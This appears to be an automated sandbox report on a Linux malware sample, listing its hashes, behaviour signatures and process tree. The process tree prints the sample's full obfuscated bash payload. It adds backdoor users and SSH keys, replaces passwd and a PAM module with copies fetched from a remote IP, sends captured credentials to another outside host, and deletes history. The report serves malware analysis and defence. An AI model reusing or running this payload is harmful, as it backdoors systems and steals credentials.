Analysis
-
max time kernel
144s -
max time network
129s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
-
submitted
27-11-2024 05:48
General
-
Target
样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383
-
Size
1.0MB
-
MD5
73f9917255a953eb749f5a3c90e3b383
-
SHA1
c8e392cf523aca7e2df62f72d68c83829f0c085d
-
SHA256
c5c11802623d02ba9b1c2c7a52579dbf0c3aa4c87ae6fc85cbfcd71dffffec27
-
SHA512
65b8946b67d42003272690266ccddb59ce715edd16eb6e67e8c3e2b34bb9e092ec736900432efbc1c70777c831742f820b61de8098a6438005641df4f3ddbe46
-
SSDEEP
12288:fbS+JhtEBBYYFkfciIqELZ3OlN6myOP7/i7L95k2rHNq9EnE:fXJ/EBJFkfciIjLZ3Ih/i7LbLNq9
Malware Config
Signatures
-
Modifies password files for system users/ groups 1 TTPs 16 IoCs
Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Modifies PAM framework files 1 TTPs 1 IoCs
Modifies Linux PAM framework files, possibly to intercept credentials.
-
OS Credential Dumping 1 TTPs 10 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 3 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Adds a user to the system 1 IoCs
-
Attempts to change immutable files 10 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks hardware identifiers (DMI) 1 TTPs 2 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Checks mountinfo of local process 1 TTPs 2 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files 1 TTPs 1 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies special file permissions 1 TTPs 3 IoCs
Adds special setuid and/ or setgid bits on a file, possibly to elevate privileges.
-
Write file to user bin folder 2 IoCs
-
Reads process memory 1 TTPs 21 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 3 IoCs
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 5 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Software Deployment Tools 1 TTPs 3 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B3831⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c "exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' \"\$@\"" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B3831⤵
-
/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B3831⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c " #!/bin/bash z=\" \";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=\$';LIz='2.1';eCz='Yun';hLz='MR\"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l\"';OCz='|/z';eFz='\$6\$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='\" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s\"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> \$';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' \"\$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\\''';TBz=' /d';fEz='g s';WCz=''\\''\\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\\''\\0';tDz='-ST';rBz='&1 ';BBz=' \"i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x \$';aGz=' sh';tGz='roo';uBz='/nu';HFz='\"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' \$H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\\''';kCz='/va';eIz='\$pa';PCz='|/f';mJz='XUh';mKz=' '\\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u \$';aLz=' \"K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' \"r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='\$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='\$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\\''\\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e \"';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f \$';tBz='dev';fBz=' wr';hJz='i01';WGz='\$(s';pHz='_tm';qCz='ll.';IEz='e \$';LCz='sh\\';EDz='cro';UGz='rho';Fz='m'\\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=\$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\\'' |';pz='omm';Xz='Red';uEz=' \"c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' \$u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o\$K';qJz='wXq';eEz='vin';NEz='ng\"';gLz='! X';DEz='/up';iz='ID ';eHz='\"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\\''';dHz=' /b';mDz='o \"';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='\"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n \"';LEz='er ';ZLz='it0';gIz='le;';ABz='o \$';XCz=''\\'' '\\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d\"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='\" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\\''';YGz=' -u';wEz='tin';gJz='m\$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me\"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='\$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval \"\$Az\$Bz\$Cz\$Dz\$Ez\$Fz\$z\$Gz\$Hz\$Iz\$Jz\$Kz\$Lz\$Mz\$z\$Nz\$Oz\$Pz\$Qz\$Rz\$Sz\$z\$Tz\$Uz\$Vz\$Iz\$Jz\$Wz\$Mz\$z\$Xz\$Iz\$Jz\$Kz\$Yz\$Mz\$z\$Zz\$az\$Iz\$Jz\$Kz\$bz\$Mz\$z\$cz\$dz\$Cz\$Dz\$ez\$Fz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$fz\$oz\$pz\$qz\$rz\$sz\$tz\$uz\$vz\$wz\$xz\$z\$mz\$nz\$z\$yz\$ABz\$Gz\$Hz\$BBz\$CBz\$DBz\$EBz\$FBz\$GBz\$HBz\$IBz\$z\$JBz\$KBz\$LBz\$MBz\$NBz\$OBz\$PBz\$CBz\$DBz\$QBz\$sz\$tz\$RBz\$SBz\$TBz\$UBz\$VBz\$WBz\$z\$XBz\$QBz\$YBz\$ZBz\$aBz\$HBz\$bBz\$cBz\$dBz\$vz\$wz\$xz\$z\$eBz\$z\$fz\$oz\$pz\$qz\$rz\$fBz\$gBz\$hBz\$TBz\$UBz\$VBz\$WBz\$z\$mz\$nz\$z\$yz\$ABz\$Zz\$az\$BBz\$CBz\$DBz\$EBz\$iBz\$jBz\$kBz\$lBz\$z\$JBz\$KBz\$mBz\$CBz\$DBz\$QBz\$iBz\$jBz\$kBz\$nBz\$cBz\$dBz\$vz\$wz\$xz\$z\$XBz\$QBz\$YBz\$ZBz\$aBz\$gBz\$oBz\$pBz\$qBz\$rBz\$sBz\$tBz\$uBz\$vBz\$z\$wBz\$QBz\$YBz\$ZBz\$aBz\$gBz\$oBz\$pBz\$qBz\$rBz\$sBz\$tBz\$uBz\$vBz\$z\$eBz\$z\$eBz\$z\$xBz\$yBz\$ACz\$BCz\$CCz\$DCz\$ECz\$FCz\$GCz\$HCz\$ICz\$JCz\$KCz\$LCz\$MCz\$NCz\$LCz\$OCz\$LCz\$PCz\$QCz\$RCz\$sz\$LBz\$SCz\$TCz\$UCz\$VCz\$WCz\$XCz\$YCz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$yz\$ABz\$cz\$ZCz\$aCz\$bCz\$cCz\$dCz\$eCz\$fCz\$gCz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$nCz\$oCz\$pCz\$ZBz\$qCz\$rCz\$z\$kCz\$lCz\$mCz\$nCz\$oCz\$pCz\$ZBz\$qCz\$sCz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$uCz\$vCz\$wCz\$xCz\$yCz\$ADz\$BDz\$CDz\$CBz\$DBz\$DDz\$z\$eBz\$z\$EDz\$FDz\$GDz\$HDz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$NDz\$ODz\$PDz\$z\$uCz\$vCz\$QDz\$RDz\$EDz\$FDz\$SDz\$z\$TDz\$UDz\$CCz\$VDz\$WDz\$XDz\$z\$eBz\$z\$IDz\$JDz\$YDz\$ZDz\$NCz\$IDz\$JDz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$fz\$aDz\$bDz\$cDz\$IDz\$JDz\$YDz\$dDz\$eDz\$fDz\$z\$gDz\$kCz\$lCz\$mCz\$nCz\$hDz\$iDz\$VCz\$jDz\$kDz\$iDz\$lDz\$z\$hCz\$iCz\$jCz\$jDz\$kDz\$iDz\$lDz\$z\$yz\$mDz\$nDz\$oDz\$IDz\$JDz\$gCz\$z\$eBz\$z\$eBz\$z\$pDz\$aBz\$qDz\$rDz\$z\$pDz\$aBz\$qDz\$sDz\$z\$pDz\$aBz\$tDz\$uDz\$vDz\$z\$pDz\$aBz\$tDz\$uDz\$wDz\$z\$pDz\$aBz\$tDz\$uDz\$xDz\$yDz\$z\$IDz\$JDz\$KDz\$AEz\$BEz\$CEz\$DEz\$EEz\$oDz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$IDz\$JDz\$FEz\$AEz\$BEz\$CEz\$DEz\$EEz\$oDz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$uCz\$vCz\$AEz\$BEz\$CEz\$DEz\$EEz\$GEz\$z\$yz\$HEz\$IEz\$Az\$JEz\$KEz\$LEz\$ZBz\$MEz\$NEz\$z\$OEz\$PEz\$DDz\$z\$fz\$QEz\$REz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$ZEz\$aEz\$bEz\$z\$yz\$HEz\$IEz\$Gz\$Hz\$cEz\$dEz\$eEz\$fEz\$sCz\$gEz\$lBz\$z\$IDz\$JDz\$KDz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$FEz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$uCz\$vCz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$uCz\$vCz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$qEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$eBz\$z\$fz\$aDz\$sEz\$hEz\$iEz\$tEz\$eDz\$fDz\$z\$yz\$HEz\$IEz\$Gz\$Hz\$uEz\$vEz\$wEz\$fEz\$sCz\$YDz\$xEz\$yEz\$gCz\$z\$AFz\$BFz\$CFz\$DFz\$z\$eBz\$z\$gDz\$gEz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$EFz\$FFz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$yz\$HEz\$IEz\$Nz\$GFz\$HFz\$IFz\$JFz\$KFz\$LFz\$MFz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$NFz\$OFz\$PFz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$QFz\$RFz\$SFz\$z\$TFz\$UFz\$VFz\$WFz\$YBz\$XFz\$YFz\$ZFz\$z\$aFz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$fFz\$gFz\$hFz\$iFz\$jFz\$kFz\$lFz\$mFz\$nFz\$oFz\$pFz\$qFz\$rFz\$sFz\$tFz\$uFz\$vFz\$wFz\$xFz\$yFz\$AGz\$BGz\$CGz\$DGz\$EGz\$FGz\$GGz\$HGz\$IGz\$JGz\$KGz\$LGz\$MGz\$NGz\$OGz\$PGz\$VFz\$WFz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$EDz\$FDz\$GDz\$QGz\$xBz\$RGz\$SGz\$TGz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$xBz\$UGz\$VGz\$WGz\$XGz\$YGz\$cDz\$xBz\$RGz\$ZGz\$aGz\$bGz\$cGz\$dGz\$eGz\$fGz\$gGz\$z\$uCz\$vCz\$XFz\$YFz\$hGz\$iGz\$DFz\$jGz\$kGz\$lGz\$mGz\$gEz\$nGz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$gDz\$kCz\$lCz\$mCz\$nCz\$oGz\$JFz\$PGz\$pGz\$qGz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$rGz\$sGz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$fFz\$gFz\$hFz\$iFz\$jFz\$kFz\$lFz\$mFz\$nFz\$oFz\$pFz\$qFz\$rFz\$sFz\$tFz\$uFz\$vFz\$wFz\$xFz\$yFz\$AGz\$BGz\$CGz\$DGz\$EGz\$FGz\$GGz\$HGz\$IGz\$JGz\$KGz\$LGz\$MGz\$NGz\$OGz\$tGz\$uGz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$IDz\$JDz\$KDz\$vGz\$jDz\$wGz\$ECz\$FCz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$KDz\$vGz\$xGz\$yGz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$CHz\$jDz\$wGz\$ECz\$FCz\$jDz\$wGz\$ECz\$DHz\$lEz\$EHz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$CHz\$xGz\$yGz\$NCz\$AHz\$BHz\$AEz\$BEz\$JCz\$QFz\$RFz\$FHz\$GHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$HHz\$jDz\$IHz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$VHz\$WHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$FBz\$XHz\$YHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$z\$hCz\$iCz\$ZHz\$aHz\$JCz\$QFz\$RFz\$bHz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$hCz\$iCz\$cHz\$dHz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$gDz\$jDz\$wGz\$ECz\$FCz\$xGz\$yGz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$yz\$HEz\$IEz\$Nz\$GFz\$eHz\$RFz\$fHz\$gHz\$hHz\$iHz\$gCz\$z\$fz\$aDz\$bDz\$jHz\$JCz\$QFz\$kHz\$lHz\$mHz\$mz\$nz\$z\$HHz\$nHz\$NCz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$oHz\$pHz\$qHz\$rHz\$sHz\$tHz\$uHz\$vHz\$wHz\$xHz\$yHz\$AIz\$BIz\$CIz\$DIz\$QFz\$kHz\$lHz\$EIz\$FIz\$LBz\$GIz\$HIz\$IIz\$JIz\$KIz\$LIz\$MIz\$NIz\$OIz\$PIz\$QIz\$RIz\$z\$hCz\$iCz\$jCz\$nHz\$NCz\$oHz\$pHz\$SIz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$eBz\$z\$oHz\$TIz\$UIz\$MDz\$QFz\$VIz\$WIz\$XIz\$YIz\$kEz\$z\$fz\$QEz\$ZIz\$oHz\$TIz\$aIz\$eDz\$fDz\$z\$fz\$bIz\$HCz\$cIz\$dIz\$kHz\$lHz\$eIz\$fIz\$gIz\$aEz\$bEz\$z\$yz\$mDz\$UEz\$hIz\$iIz\$jIz\$kIz\$QIz\$lIz\$mIz\$nIz\$oIz\$pIz\$qIz\$rIz\$UEz\$sIz\$tIz\$uIz\$wGz\$QIz\$RIz\$vIz\$wIz\$oHz\$TIz\$sGz\$z\$eBz\$z\$eBz\$z\$xIz\$sGz\$z\$HHz\$kCz\$lCz\$mCz\$nCz\$yIz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$VHz\$WHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$FBz\$XHz\$YHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$nCz\$AJz\$ECz\$BJz\$z\$CJz\$DJz\$EJz\$FJz\$GJz\$z\$fz\$bIz\$HCz\$cIz\$HJz\$IJz\$CJz\$eDz\$fDz\$z\$yz\$mDz\$JJz\$KJz\$AHz\$BHz\$LJz\$xCz\$yCz\$ADz\$BDz\$AHz\$BHz\$vIz\$MJz\$NJz\$OJz\$PJz\$z\$eBz\$z\$eBz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$xBz\$QJz\$RJz\$SJz\$TJz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$xBz\$bFz\$cFz\$UJz\$VJz\$WJz\$SJz\$TJz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$xBz\$bFz\$cFz\$UJz\$XJz\$YJz\$ZJz\$aJz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$bJz\$cJz\$dJz\$eJz\$fJz\$gJz\$hJz\$iJz\$jJz\$kJz\$lJz\$mJz\$nJz\$oJz\$pJz\$qJz\$rJz\$sJz\$tJz\$uJz\$vJz\$wJz\$xJz\$yJz\$AKz\$BKz\$CKz\$DKz\$EKz\$FKz\$GKz\$HKz\$IKz\$JKz\$OGz\$ZJz\$aJz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$CHz\$kCz\$lCz\$mCz\$nCz\$oGz\$JFz\$KKz\$LKz\$ZJz\$aJz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$eBz\$z\$fz\$MKz\$NKz\$OKz\$PKz\$QKz\$RKz\$SKz\$eDz\$fDz\$z\$yz\$HEz\$IEz\$Xz\$uEz\$vEz\$wEz\$TKz\$UKz\$YDz\$xEz\$yEz\$gCz\$z\$AFz\$BFz\$kCz\$lCz\$mCz\$VKz\$z\$eBz\$z\$fz\$aDz\$bDz\$wCz\$xCz\$yCz\$ADz\$WKz\$HBz\$aIz\$eDz\$fDz\$z\$CHz\$kCz\$lCz\$mCz\$nCz\$XKz\$YKz\$ZKz\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$z\$eBz\$z\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$dKz\$tBz\$uBz\$aBz\$eKz\$tBz\$uBz\$aBz\$fKz\$gKz\$hKz\$iKz\$jKz\$z\$xBz\$kKz\$lKz\$ACz\$BCz\$CCz\$DCz\$ECz\$FCz\$GCz\$HCz\$ICz\$JCz\$KCz\$LCz\$MCz\$NCz\$LCz\$OCz\$LCz\$PCz\$QCz\$RCz\$sz\$LBz\$SCz\$TCz\$UCz\$VCz\$WCz\$XCz\$mKz\$nKz\$oKz\$pKz\$z\$HBz\$JHz\$qKz\$HIz\$IIz\$rKz\$sKz\$tKz\$uKz\$vKz\$wKz\$xKz\$YFz\$yKz\$YFz\$ALz\$BLz\$xBz\$kKz\$CLz\$EIz\$DLz\$ELz\$uHz\$vHz\$wHz\$FLz\$GLz\$HLz\$ILz\$JLz\$KLz\$xGz\$LLz\$MLz\$NLz\$OLz\$PLz\$YFz\$QLz\$RLz\$z\$SLz\$TLz\$ULz\$GJz\$z\$uCz\$vCz\$hEz\$EJz\$VLz\$SLz\$TLz\$WLz\$z\$uCz\$vCz\$wCz\$xCz\$yCz\$ADz\$BDz\$XLz\$YLz\$z\$uCz\$vCz\$YBz\$ZLz\$z\$yz\$HEz\$IEz\$Zz\$az\$aLz\$bLz\$cLz\$dLz\$eLz\$fLz\$gLz\$hLz\$z\$yz\$HEz\$IEz\$Tz\$Uz\$Vz\"" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B3831⤵
- Modifies PAM framework files
-
/usr/bin/apt-getapt-get install -y msr-tools2⤵
- Deletes log files
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/bin/ischroot/usr/bin/ischroot -t3⤵
- Checks mountinfo of local process
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"3⤵
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt4⤵
- OS Credential Dumping
-
/usr/local/sbin/localelocale charmap5⤵
-
-
/usr/local/bin/localelocale charmap5⤵
-
-
/usr/sbin/localelocale charmap5⤵
-
-
/usr/bin/localelocale charmap5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-protected-field3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb3⤵
- Write file to user bin folder
-
/usr/sbin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
-
/usr/bin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
